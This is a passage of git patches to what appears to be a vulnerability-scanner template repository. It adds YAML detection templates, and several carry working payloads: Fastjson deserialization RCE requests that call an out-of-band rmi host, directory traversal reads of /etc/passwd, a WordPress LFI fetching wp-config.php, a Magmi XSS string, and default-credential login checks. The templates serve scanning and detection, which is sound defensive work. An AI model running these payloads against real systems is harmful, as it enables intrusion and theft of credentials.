+++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 vulnerabilities/fastjson/fastjson-1224-rce.yaml diff --git a/vulnerabilities/fastjson/fastjson-1224-rce.yaml b/vulnerabilities/fastjson/fastjson-1224-rce.yaml new file mode 100644 index 0000000000..5740b7204c --- /dev/null +++ b/vulnerabilities/fastjson/fastjson-1224-rce.yaml @@ -0,0 +1,39 @@ +id: fastjson-1224-rce + +info: + name: Fastjson 1.2.24 Deserialization RCE + author: zh + severity: critical + reference: + - https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.24-rce + - https://www.freebuf.com/vuls/208339.html + - http://xxlegend.com/2017/04/29/title-%20fastjson%20%E8%BF%9C%E7%A8%8B%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96poc%E7%9A%84%E6%9E%84%E9%80%A0%E5%92%8C%E5%88%86%E6%9E%90/ + tags: fastjson,rce,deserialization + +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "b":{ + "@type":"com.sun.rowset.JdbcRowSetImpl", + "dataSourceName":"rmi://{{interactsh-url}}/Exploit", + "autoCommit":true + } + } + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms DNS Interaction + words: + - "dns" + + - type: word + condition: and + words: + - "Internal Server Error" + - "500" \ No newline at end of file From ed9a65d436899003a7d96c272ba7e6cd1d5ebbb8 Mon Sep 17 00:00:00 2001 From: Me9187 <78823654+Meeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee@users.noreply.github.com> Date: Sun, 10 Oct 2021 20:49:54 +0100 Subject: [PATCH 2832/4083] Create electron-version-detect.yaml Detects electron version from package.json files --- file/electron/electron-version-detect.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 file/electron/electron-version-detect.yaml diff --git a/file/electron/electron-version-detect.yaml b/file/electron/electron-version-detect.yaml new file mode 100644 index 0000000000..f4baf67d76 --- /dev/null +++ b/file/electron/electron-version-detect.yaml @@ -0,0 +1,22 @@ +id: electron-version-detect.yaml + +info: + name: Electron Version Detect + author: me9187 + severity: info + tags: electron,file + reference: + - https://www.electronjs.org/blog/chromium-rce-vulnerability/ + # Check the electron version on snyk.io to see if the bundled chromium version is outdated + # If the chromium version is old you can turn XSS into RCE + +file: + - extensions: + - json + + extractors: + - type: regex + part: all + regex: + - '"electronVersion":"[^"]*"' + From 88eb8c0b2ddb0d682e151a05d6e78e07f3aa0465 Mon Sep 17 00:00:00 2001 From: Me9187 <78823654+Meeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee@users.noreply.github.com> Date: Sun, 10 Oct 2021 20:53:30 +0100 Subject: [PATCH 2833/4083] Update electron-version-detect.yaml --- file/electron/electron-version-detect.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/file/electron/electron-version-detect.yaml b/file/electron/electron-version-detect.yaml index f4baf67d76..c0a8029584 100644 --- a/file/electron/electron-version-detect.yaml +++ b/file/electron/electron-version-detect.yaml @@ -19,4 +19,3 @@ file: part: all regex: - '"electronVersion":"[^"]*"' - From 52b49d2abfc88fe954cbd2d500a96713c8fabcbc Mon Sep 17 00:00:00 2001 From: Me9187 <78823654+Meeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee@users.noreply.github.com> Date: Sun, 10 Oct 2021 20:59:22 +0100 Subject: [PATCH 2834/4083] Update electron-version-detect.yaml fucking yaml --- file/electron/electron-version-detect.yaml | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/file/electron/electron-version-detect.yaml b/file/electron/electron-version-detect.yaml index c0a8029584..1e72b8e93e 100644 --- a/file/electron/electron-version-detect.yaml +++ b/file/electron/electron-version-detect.yaml @@ -15,7 +15,6 @@ file: - json extractors: - - type: regex - part: all - regex: - - '"electronVersion":"[^"]*"' + - type: regex + regex: + - '"electronVersion":"[^"]*"' From 673a9107c54ef9fd3521734399a09ab9dcbbf5a5 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Mon, 11 Oct 2021 01:38:44 +0530 Subject: [PATCH 2835/4083] misc updates --- exposed-panels/lansweeper-login.yaml | 17 ++++++++++------- .../unauthenticated-lansweeper.yaml | 6 +++--- 2 files changed, 13 insertions(+), 10 deletions(-) diff --git a/exposed-panels/lansweeper-login.yaml b/exposed-panels/lansweeper-login.yaml index 1fc63607fa..4ad6f52a67 100644 --- a/exposed-panels/lansweeper-login.yaml +++ b/exposed-panels/lansweeper-login.yaml @@ -10,14 +10,17 @@ requests: - method: GET path: - "{{BaseURL}}/login.aspx" + - "{{BaseURL}}/favicon.ico" + stop-at-first-match: true + matchers-condition: or matchers: - - type: regex - regex: - - <title>[\s\S]*?Lansweeper - Login[\s\S]*?<\/title> - condition: or - + - type: word + name: login + words: + - "Lansweeper - Login" + - type: dsl - name: lansweeper + name: favicon dsl: - - "len(body)==15086 && status_code==200 && (\"0A60C945E674EC7B953429B515519567\" == md5(body))" \ No newline at end of file + - "status_code==200 && (\"1847799946\" == mmh3(base64_py(body)))" \ No newline at end of file diff --git a/misconfiguration/unauthenticated-lansweeper.yaml b/misconfiguration/unauthenticated-lansweeper.yaml index 2f1f393bfb..f110a4cabb 100644 --- a/misconfiguration/unauthenticated-lansweeper.yaml +++ b/misconfiguration/unauthenticated-lansweeper.yaml @@ -12,6 +12,6 @@ requests: - "{{BaseURL}}/Default.aspx" matchers: - - type: regex - regex: - - <title>[\s\S]*?Main page - Lansweeper[\s\S]*?<\/title> \ No newline at end of file + - type: word + words: + - "Main page - Lansweeper" \ No newline at end of file From 3935c2fda12f23d4141783e5d5dc6b50a75674e8 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Mon, 11 Oct 2021 03:55:04 +0530 Subject: [PATCH 2836/4083] misc update --- file/electron/electron-version-detect.yaml | 5 +---- 1 file changed, 1 insertion(+), 4 deletions(-) diff --git a/file/electron/electron-version-detect.yaml b/file/electron/electron-version-detect.yaml index 1e72b8e93e..d5276b5cc7 100644 --- a/file/electron/electron-version-detect.yaml +++ b/file/electron/electron-version-detect.yaml @@ -5,10 +5,7 @@ info: author: me9187 severity: info tags: electron,file - reference: - - https://www.electronjs.org/blog/chromium-rce-vulnerability/ - # Check the electron version on snyk.io to see if the bundled chromium version is outdated - # If the chromium version is old you can turn XSS into RCE + reference: https://www.electronjs.org/blog/chromium-rce-vulnerability/ file: - extensions: From 56730e2f2b02272950692b6c39633697bdf81f2b Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Mon, 11 Oct 2021 03:59:45 +0530 Subject: [PATCH 2837/4083] more fixes --- default-logins/UCMDB/ucmdb-default-login.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/default-logins/UCMDB/ucmdb-default-login.yaml b/default-logins/UCMDB/ucmdb-default-login.yaml index 6c3863b68b..3b6c4aacb8 100644 --- a/default-logins/UCMDB/ucmdb-default-login.yaml +++ b/default-logins/UCMDB/ucmdb-default-login.yaml @@ -12,7 +12,7 @@ requests: POST /ucmdb-ui/cms/loginRequest.do; HTTP/1.1 Host: {{Hostname}} - customerID=1&isEncoded=false&userName=diagnostics&password={{base64(password)}}&ldapServerName=UCMDB + customerID=1&isEncoded=false&userName={{username}}&password={{base64(password)}}&ldapServerName=UCMDB payloads: username: @@ -26,7 +26,8 @@ requests: - type: status status: - 200 + - type: word + part: header words: - "LWSSO_COOKIE_KEY" - part: header From 50965de36d0529ffe862307c273de1f0673828b8 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Mon, 11 Oct 2021 03:59:57 +0530 Subject: [PATCH 2838/4083] Update ucmdb-default-login.yaml --- default-logins/UCMDB/ucmdb-default-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/default-logins/UCMDB/ucmdb-default-login.yaml b/default-logins/UCMDB/ucmdb-default-login.yaml index 3b6c4aacb8..d7dc80bd03 100644 --- a/default-logins/UCMDB/ucmdb-default-login.yaml +++ b/default-logins/UCMDB/ucmdb-default-login.yaml @@ -14,12 +14,12 @@ requests: customerID=1&isEncoded=false&userName={{username}}&password={{base64(password)}}&ldapServerName=UCMDB + attack: pitchfork payloads: username: - diagnostics password: - admin - attack: pitchfork matchers-condition: and matchers: From d76884c109622b7a8b6a782a955e9e40de8d2b9e Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Mon, 11 Oct 2021 04:07:10 +0530 Subject: [PATCH 2839/4083] moving files around --- .../2020/CVE-2020-8641.yaml | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) rename lotus-core-cms-lfi.yaml => cves/2020/CVE-2020-8641.yaml (64%) diff --git a/lotus-core-cms-lfi.yaml b/cves/2020/CVE-2020-8641.yaml similarity index 64% rename from lotus-core-cms-lfi.yaml rename to cves/2020/CVE-2020-8641.yaml index a95e75c0f9..ccfc1cea5b 100644 --- a/lotus-core-cms-lfi.yaml +++ b/cves/2020/CVE-2020-8641.yaml @@ -1,11 +1,13 @@ -id: lotus-core-cms-lfi +id: CVE-2020-8641 info: name: Lotus Core CMS 1.0.1 - Local File Inclusion author: 0x_Akoko severity: high - tags: lfi - reference: https://cxsecurity.com/issue/WLB-2020010234 + tags: cve,cve202,lfi,lotus + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2020-8641 + - https://cxsecurity.com/issue/WLB-2020010234 requests: - method: GET @@ -17,7 +19,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" - type: status status: From 5cf090ddec06e022517244350de696103e12dfe3 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 10 Oct 2021 22:40:30 +0000 Subject: [PATCH 2840/4083] Auto Generated CVE annotations [Sun Oct 10 22:40:30 UTC 2021] :robot: --- cves/2020/CVE-2020-8641.yaml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/cves/2020/CVE-2020-8641.yaml b/cves/2020/CVE-2020-8641.yaml index ccfc1cea5b..16a0392414 100644 --- a/cves/2020/CVE-2020-8641.yaml +++ b/cves/2020/CVE-2020-8641.yaml @@ -8,6 +8,12 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-8641 - https://cxsecurity.com/issue/WLB-2020010234 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-8641 + cwe-id: CWE-22 + description: "Lotus Core CMS 1.0.1 allows authenticated Local File Inclusion of .php files via directory traversal in the index.php page_slug parameter." requests: - method: GET From 86f52501a5dd8517949eb4edbb63a679552ae30d Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Mon, 11 Oct 2021 04:23:52 +0530 Subject: [PATCH 2841/4083] Added Fastjson 1.2.47 Deserialization RCE --- .../fastjson/fastjson-1224-rce.yaml | 2 +- .../fastjson/fastjson-1247-rce.yaml | 43 +++++++++++++++++++ 2 files changed, 44 insertions(+), 1 deletion(-) create mode 100644 vulnerabilities/fastjson/fastjson-1247-rce.yaml diff --git a/vulnerabilities/fastjson/fastjson-1224-rce.yaml b/vulnerabilities/fastjson/fastjson-1224-rce.yaml index 5740b7204c..684f4da37f 100644 --- a/vulnerabilities/fastjson/fastjson-1224-rce.yaml +++ b/vulnerabilities/fastjson/fastjson-1224-rce.yaml @@ -1,4 +1,4 @@ -id: fastjson-1224-rce +id: fastjson-1.2.24-rce info: name: Fastjson 1.2.24 Deserialization RCE diff --git a/vulnerabilities/fastjson/fastjson-1247-rce.yaml b/vulnerabilities/fastjson/fastjson-1247-rce.yaml new file mode 100644 index 0000000000..5339bb04b7 --- /dev/null +++ b/vulnerabilities/fastjson/fastjson-1247-rce.yaml @@ -0,0 +1,43 @@ +id: fastjson-1.2.47-rce + +info: + name: Fastjson 1.2.47 Deserialization RCE + author: zh + severity: critical + reference: + - https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.47-rce + - https://www.freebuf.com/vuls/208339.html + - https://cert.360.cn/warning/detail?id=7240aeab581c6dc2c9c5350756079955 + tags: fastjson,rce,deserialization + +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "a":{ + "@type":"java.lang.Class", + "val":"com.sun.rowset.JdbcRowSetImpl" + }, + "b":{ + "@type":"com.sun.rowset.JdbcRowSetImpl", + "dataSourceName":"rmi://{{interactsh-url}}/Exploit", + "autoCommit":true + } + } + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms DNS Interaction + words: + - "dns" + + - type: word + condition: and + words: + - "Bad Request" + - "400" \ No newline at end of file From 55caa61c96b479df4c3169252c5ac25f9a7761de Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Mon, 11 Oct 2021 18:22:14 +0700 Subject: [PATCH 2842/4083] Create CVE-2018-9205.yaml --- cves/2018/CVE-2018-9205.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 cves/2018/CVE-2018-9205.yaml diff --git a/cves/2018/CVE-2018-9205.yaml b/cves/2018/CVE-2018-9205.yaml new file mode 100644 index 0000000000..1e20d973fe --- /dev/null +++ b/cves/2018/CVE-2018-9205.yaml @@ -0,0 +1,28 @@ + +id: CVE-2018-9205 + +info: + name: Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure + author: daffainfo + severity: high + description: Vulnerability in avatar_uploader v7.x-1.0-beta8 , The code in view.php doesnt verify users or sanitize the file path. + reference: + - https://www.exploit-db.com/exploits/44501 + - https://nvd.nist.gov/vuln/detail/CVE-2018-9205 + tags: cve,cve2018,lfi,drupal + +requests: + - method: GET + path: + - "{{BaseURL}}/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From da08f02913e9a2ca31ea21c5d00ace839f2bc79c Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Mon, 11 Oct 2021 16:52:28 +0530 Subject: [PATCH 2843/4083] Update and rename advanced-access-manager-plugin-lfi.yaml to vulnerabilities/wordpress/advanced-access-manager-lfi.yaml --- advanced-access-manager-plugin-lfi.yaml | 26 ----------------- .../advanced-access-manager-lfi.yaml | 29 +++++++++++++++++++ 2 files changed, 29 insertions(+), 26 deletions(-) delete mode 100644 advanced-access-manager-plugin-lfi.yaml create mode 100644 vulnerabilities/wordpress/advanced-access-manager-lfi.yaml diff --git a/advanced-access-manager-plugin-lfi.yaml b/advanced-access-manager-plugin-lfi.yaml deleted file mode 100644 index b93c4467e6..0000000000 --- a/advanced-access-manager-plugin-lfi.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: advanced-access-manager-plugin-lfi - -info: - name: Advanced Access Manager < 5.9.9 - Unauthenticated Local File Inclusion - author: 0x_Akoko - severity: high - tags: wordpress,wp-plugin,lfi,wp - reference: https://wpscan.com/vulnerability/9873 - -requests: - - method: GET - path: - - '{{BaseURL}}/?aam-media=wp-config.php ' - - matchers-condition: and - matchers: - - type: word - words: - - "DB_NAME" - - "DB_PASSWORD" - part: body - condition: and - - - type: status - status: - - 200 diff --git a/vulnerabilities/wordpress/advanced-access-manager-lfi.yaml b/vulnerabilities/wordpress/advanced-access-manager-lfi.yaml new file mode 100644 index 0000000000..9838f210f1 --- /dev/null +++ b/vulnerabilities/wordpress/advanced-access-manager-lfi.yaml @@ -0,0 +1,29 @@ +id: advanced-access-manager-lfi + +info: + name: Advanced Access Manager < 5.9.9 - Unauthenticated Local File Inclusion + author: 0x_Akoko + severity: high + description: The Advanced Access Manager WordPress plugin, versions before 5.9.9, allowed reading arbitrary files. This way one can download the wp-config.php file and get access to the database, which is publicly reachable on many servers. + reference: + - https://wpscan.com/vulnerability/9873 + - https://id.wordpress.org/plugins/advanced-access-manager/ + tags: wordpress,wp-plugin,lfi + +requests: + - method: GET + path: + - '{{BaseURL}}/?aam-media=wp-config.php' + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + + - type: status + status: + - 200 From b9a2afe546a8b6c30b0e316395d64a8443d3d6d2 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Mon, 11 Oct 2021 16:53:15 +0530 Subject: [PATCH 2844/4083] Update CVE-2018-9205.yaml --- cves/2018/CVE-2018-9205.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/cves/2018/CVE-2018-9205.yaml b/cves/2018/CVE-2018-9205.yaml index 1e20d973fe..fd19752de0 100644 --- a/cves/2018/CVE-2018-9205.yaml +++ b/cves/2018/CVE-2018-9205.yaml @@ -1,4 +1,3 @@ - id: CVE-2018-9205 info: From 7cd433faf978a2c2e1c0a01541abc89ee3b7a8fd Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Mon, 11 Oct 2021 18:24:36 +0700 Subject: [PATCH 2845/4083] Create CVE-2015-2067.yaml --- cves/2015/CVE-2015-2067.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2015/CVE-2015-2067.yaml diff --git a/cves/2015/CVE-2015-2067.yaml b/cves/2015/CVE-2015-2067.yaml new file mode 100644 index 0000000000..5e4ba266b4 --- /dev/null +++ b/cves/2015/CVE-2015-2067.yaml @@ -0,0 +1,27 @@ +id: CVE-2015-2067 + +info: + name: Magento Server Magmi Plugin - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in web/ajax_pluginconf.php in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. + reference: + - https://www.exploit-db.com/exploits/35996 + - https://nvd.nist.gov/vuln/detail/CVE-2015-2067 + tags: cve,cve2015,lfi,magento + +requests: + - method: GET + path: + - "{{BaseURL}}/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From d7cd9a21deac98840aaab5cf25994836bb30e850 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 11 Oct 2021 11:27:30 +0000 Subject: [PATCH 2846/4083] Auto Generated CVE annotations [Mon Oct 11 11:27:30 UTC 2021] :robot: --- cves/2018/CVE-2018-9205.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2018/CVE-2018-9205.yaml b/cves/2018/CVE-2018-9205.yaml index fd19752de0..6934634c1d 100644 --- a/cves/2018/CVE-2018-9205.yaml +++ b/cves/2018/CVE-2018-9205.yaml @@ -9,6 +9,11 @@ info: - https://www.exploit-db.com/exploits/44501 - https://nvd.nist.gov/vuln/detail/CVE-2018-9205 tags: cve,cve2018,lfi,drupal + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2018-9205 + cwe-id: CWE-22 requests: - method: GET From 13fe13291389e3678b4e03df45508807190a287f Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Mon, 11 Oct 2021 18:28:08 +0700 Subject: [PATCH 2847/4083] Create CVE-2015-2068.yaml --- cves/2015/CVE-2015-2068.yaml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 cves/2015/CVE-2015-2068.yaml diff --git a/cves/2015/CVE-2015-2068.yaml b/cves/2015/CVE-2015-2068.yaml new file mode 100644 index 0000000000..750fb72099 --- /dev/null +++ b/cves/2015/CVE-2015-2068.yaml @@ -0,0 +1,30 @@ +id: CVE-2020-11930 + +info: + name: Magento Server Magmi Plugin - Cross Site Scripting + author: daffainfo + severity: medium + description: Multiple cross-site scripting (XSS) vulnerabilities in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allow remote attackers to inject arbitrary web script or HTML via the (1) profile parameter to web/magmi.php or (2) QUERY_STRING to web/magmi_import_run.php. + reference: + - https://www.exploit-db.com/exploits/35996 + - https://nvd.nist.gov/vuln/detail/CVE-2015-2068 + tags: cve,cve2015,magento,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/magmi/web/magmi.php?configstep=2&profile=%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29;%3C/script%3E' + matchers-condition: and + matchers: + - type: word + part: body + words: + - "</script><script>alert('XSS');</script>" + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From 7fa72b060cec297cfb4125dbf86fbd11e8536be2 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Mon, 11 Oct 2021 17:20:52 +0530 Subject: [PATCH 2848/4083] Update zabbix-default-login.yaml --- default-logins/zabbix/zabbix-default-login.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/default-logins/zabbix/zabbix-default-login.yaml b/default-logins/zabbix/zabbix-default-login.yaml index 57c559d408..58d665b220 100644 --- a/default-logins/zabbix/zabbix-default-login.yaml +++ b/default-logins/zabbix/zabbix-default-login.yaml @@ -10,7 +10,7 @@ requests: - raw: - | POST /index.php HTTP/1.1 - Host:{{BaseURL}} + Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest @@ -31,4 +31,4 @@ requests: - type: status status: - - 302 \ No newline at end of file + - 302 From ad663f62607fbd6e906e25efda4f3ca6f983ebc6 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Mon, 11 Oct 2021 17:21:31 +0530 Subject: [PATCH 2849/4083] Update zmanda-default-login.yaml --- default-logins/zmanda/zmanda-default-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/default-logins/zmanda/zmanda-default-login.yaml b/default-logins/zmanda/zmanda-default-login.yaml index adac8a338d..0ba28984fa 100644 --- a/default-logins/zmanda/zmanda-default-login.yaml +++ b/default-logins/zmanda/zmanda-default-login.yaml @@ -12,7 +12,7 @@ requests: - raw: - | POST /ZMC_Admin_Login HTTP/1.1 - Host:{{BaseURL}} + Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Cookie: zmc_cookies_enabled=true From dace44b3afcea4471811588512770731b42c402a Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Mon, 11 Oct 2021 17:32:29 +0530 Subject: [PATCH 2851/4083] Update CVE-2015-2068.yaml --- cves/2015/CVE-2015-2068.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/cves/2015/CVE-2015-2068.yaml b/cves/2015/CVE-2015-2068.yaml index 750fb72099..0825dd5417 100644 --- a/cves/2015/CVE-2015-2068.yaml +++ b/cves/2015/CVE-2015-2068.yaml @@ -13,13 +13,14 @@ info: requests: - method: GET path: - - '{{BaseURL}}/magmi/web/magmi.php?configstep=2&profile=%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29;%3C/script%3E' + - '{{BaseURL}}/magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and matchers: - type: word part: body words: - - "</script><script>alert('XSS');</script>" + - "</script><script>alert(document.domain)</script>" - type: word part: header words: From c8d7f08e3ccedf0255ee25d9870e1c6c7bcc65f8 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Mon, 11 Oct 2021 17:33:46 +0530 Subject: [PATCH 2852/4083] Update CVE-2015-2068.yaml --- cves/2015/CVE-2015-2068.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2015/CVE-2015-2068.yaml b/cves/2015/CVE-2015-2068.yaml index 0825dd5417..df7d799905 100644 --- a/cves/2015/CVE-2015-2068.yaml +++ b/cves/2015/CVE-2015-2068.yaml @@ -1,4 +1,4 @@ -id: CVE-2020-11930 +id: CVE-2015-11930 info: name: Magento Server Magmi Plugin - Cross Site Scripting From 2d3c3a13820a6041f522b32c9ad592f43ac72bb4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Mon, 11 Oct 2021 17:35:38 +0530 Subject: [PATCH 2853/4083] Update CVE-2015-2068.yaml --- cves/2015/CVE-2015-2068.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2015/CVE-2015-2068.yaml b/cves/2015/CVE-2015-2068.yaml index df7d799905..bf1270a2d5 100644 --- a/cves/2015/CVE-2015-2068.yaml +++ b/cves/2015/CVE-2015-2068.yaml @@ -1,4 +1,4 @@ -id: CVE-2015-11930 +id: CVE-2015-2068 info: name: Magento Server Magmi Plugin - Cross Site Scripting @@ -21,6 +21,7 @@ requests: part: body words: - "</script><script>alert(document.domain)</script>" + - type: word part: header words: From 47b63ef500480d40922b21ca3f6d1cacaeee7357 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Mon, 11 Oct 2021 10:36:54 -0500 Subject: [PATCH 2854/4083] Create adiscon-loganalyzer.yaml --- exposed-panels/adiscon-loganalyzer.yaml | 34 +++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 exposed-panels/adiscon-loganalyzer.yaml diff --git a/exposed-panels/adiscon-loganalyzer.yaml b/exposed-panels/adiscon-loganalyzer.yaml new file mode 100644 index 0000000000..5f0e0bd13c --- /dev/null +++ b/exposed-panels/adiscon-loganalyzer.yaml @@ -0,0 +1,34 @@ +id: adiscon-loganalyzer + +info: + name: Detect exposed Adiscon LogAnalyzer + author: geeknik + severity: high + description: Adiscon LogAnalyzer is a web interface to syslog and other network event data. It provides easy browsing, analysis of realtime network events and reporting services. + reference: https://loganalyzer.adiscon.com/ + tags: adiscon,loganalyzer,syslog,exposures + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Adiscon LogAnalyzer' + - 'value="SYSLOG"' + - 'value="EVTRPT"' + - 'value="WEBLOG"' + condition: and + + - type: status + status: + - 200 + + - type: word + part: header + words: + - 'text/html' From df4668cb068d1b4e3029b11b5a4bd63578012364 Mon Sep 17 00:00:00 2001 From: Divya <divya.mudgal92+github@gmail.com> Date: Mon, 11 Oct 2021 14:26:30 -0400 Subject: [PATCH 2855/4083] Add hpe-system-management-homepage-login.yaml Detect HPE System Management Homepage login and version detection --- .../hpe-system-management-homepage-login.yaml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 exposed-panels/hpe-system-management-homepage-login.yaml diff --git a/exposed-panels/hpe-system-management-homepage-login.yaml b/exposed-panels/hpe-system-management-homepage-login.yaml new file mode 100644 index 0000000000..9589468ef5 --- /dev/null +++ b/exposed-panels/hpe-system-management-homepage-login.yaml @@ -0,0 +1,28 @@ +id: hpe-system-management-homepage-login + +info: + name: HPE System Management Homepage Login + author: divya_mudgal + severity: info + tags: HPE-System-Management-Homepage,tech,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/cpqlogin.htm" + + matchers-condition: and + matchers: + - type: word + words: + - "smhversion = \"HPE System Management Homepage " + + - type: word + words: + - "/proxy/ssllogin" + + extractors: + - type: regex + part: body + regex: + - "HPE System Management Homepage v([0-9-.]*)" \ No newline at end of file From b343c781650e482dd9e39bbde3e7f523dc97f2d2 Mon Sep 17 00:00:00 2001 From: Divya <divya.mudgal92+github@gmail.com> Date: Mon, 11 Oct 2021 14:56:14 -0400 Subject: [PATCH 2856/4083] Added newline in the end --- exposed-panels/hpe-system-management-homepage-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/hpe-system-management-homepage-login.yaml b/exposed-panels/hpe-system-management-homepage-login.yaml index 9589468ef5..59d2f4ec56 100644 --- a/exposed-panels/hpe-system-management-homepage-login.yaml +++ b/exposed-panels/hpe-system-management-homepage-login.yaml @@ -25,4 +25,4 @@ requests: - type: regex part: body regex: - - "HPE System Management Homepage v([0-9-.]*)" \ No newline at end of file + - "HPE System Management Homepage v([0-9-.]*)" From 37209eb4ab7818e8769ad92fc72a2d6806ec6c79 Mon Sep 17 00:00:00 2001 From: Divya <divya.mudgal92+github@gmail.com> Date: Mon, 11 Oct 2021 22:35:31 -0400 Subject: [PATCH 2857/4083] Removed trailing spaces --- exposed-panels/hpe-system-management-homepage-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/hpe-system-management-homepage-login.yaml b/exposed-panels/hpe-system-management-homepage-login.yaml index 59d2f4ec56..ed9c8af4e4 100644 --- a/exposed-panels/hpe-system-management-homepage-login.yaml +++ b/exposed-panels/hpe-system-management-homepage-login.yaml @@ -20,7 +20,7 @@ requests: - type: word words: - "/proxy/ssllogin" - + extractors: - type: regex part: body From e1b0626f082263946bd1265e29b4a1dff4c0edfc Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Tue, 12 Oct 2021 09:21:24 +0530 Subject: [PATCH 2858/4083] misc changes --- .../hpe-system-management-homepage-login.yaml | 28 ------------------- .../hpe-system-management-login.yaml | 27 ++++++++++++++++++ 2 files changed, 27 insertions(+), 28 deletions(-) delete mode 100644 exposed-panels/hpe-system-management-homepage-login.yaml create mode 100644 exposed-panels/hpe-system-management-login.yaml diff --git a/exposed-panels/hpe-system-management-homepage-login.yaml 